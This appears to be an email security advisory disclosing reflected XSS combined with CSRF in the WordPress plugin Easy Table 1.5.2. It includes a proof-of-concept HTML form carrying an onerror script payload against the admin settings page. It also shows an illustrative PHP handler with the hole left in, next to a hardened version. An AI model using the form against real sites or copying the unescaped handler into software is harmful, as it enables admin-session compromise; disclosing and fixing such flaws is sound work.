Subject: Cross-Site Scripting (XSS) in Easy Table 1.5.2
Date: Mon, 10 Aug 2015 17:50:27 +0200

Hello,

Plugin: Easy Table 1.5.2 https://wordpress.org/plugins/easy-table/

1. Cross-Site Scripting (XSS) 

An authenticated administrator's request can inject HTML/JS through the easy-table-test-area parameter, which the settings page reflects back without output encoding. The form carries no CSRF protection (no nonce check), so a third-party page can make a logged-in administrator's browser submit the payload.

Method: POST
Url: http://localhost/wp-admin/options-general.php?page=easy-table&gexttab=1
Vulnerable parameter: easy-table-test-area

Example PHP callstack:
EasyTable::easy_table_page   [/easy-table/easy-table.php:1034]

Verification:
--
<html>
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=easy-table&gexttab=1">
<input type="text" name="test-easy-table" value="1" />
<input type="text" name="easy-table-test-area" value='"><img src=x onerror=alert(1) />'>
<input type="submit">
</form>
</html>
--
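The pattern behind the report, shown as an added illustration rather than the plugin's own code: a minimal WordPress admin-page handler that reflects the POSTed test area with neither output escaping nor a nonce, beside a hardened version that uses the WordPress nonce and escaping functions. The function names and the nonce action are hypothetical; only the parameter names come from the advisory.

```php
<?php
// Added illustration, not the Easy Table plugin's code. Function names and the
// nonce action string are hypothetical; the parameter names match the advisory.

// Vulnerable pattern: the submitted value is written back into the page as-is,
// so a value like  "><img src=x onerror=alert(1) />  runs in the admin's browser,
// and because there is no nonce check any site can make a logged-in admin submit it.
function hypo_table_test_page_vulnerable() {
    $test = isset($_POST['easy-table-test-area']) ? $_POST['easy-table-test-area'] : '';
    echo '<form method="post">';
    echo '<textarea name="easy-table-test-area">' . $test . '</textarea>'; // unescaped
    echo '<input type="submit" name="test-easy-table" value="1" />';
    echo '</form>';
    if ($test !== '') {
        echo '<div class="preview">' . $test . '</div>';                   // unescaped
    }
}

// Hardened pattern: a capability check guards the handler, a nonce ties the
// submission to the admin's own session (check_admin_referer() stops on a
// mismatch, so a cross-site form fails), and every reflected value is escaped
// for the context it lands in.
function hypo_table_test_page_hardened() {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions');
    }
    $test = '';
    if (isset($_POST['test-easy-table'])) {
        check_admin_referer('hypo_table_test');                // nonce check: blocks CSRF
        if (isset($_POST['easy-table-test-area'])) {
            $test = wp_unslash($_POST['easy-table-test-area']); // raw input, escaped on output
        }
    }
    echo '<form method="post">';
    wp_nonce_field('hypo_table_test');                         // emits the hidden nonce field
    echo '<textarea name="easy-table-test-area">' . esc_textarea($test) . '</textarea>';
    echo '<input type="submit" name="test-easy-table" value="1" />';
    echo '</form>';
    if ($test !== '') {
        // wp_kses_post() drops script tags and event-handler attributes while keeping
        // the plain markup a table preview needs; use esc_html() if no markup is wanted.
        echo '<div class="preview">' . wp_kses_post($test) . '</div>';
    }
}
```

Against the hardened handler the advisory's form fails at check_admin_referer() before any output is produced, and even a submission carrying a valid nonce has its payload neutralised by esc_textarea() and wp_kses_post(); both fixes are needed, since the nonce alone would still leave a self-XSS for anyone who can obtain a valid nonce.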


--
Regards,
Marcin Probola,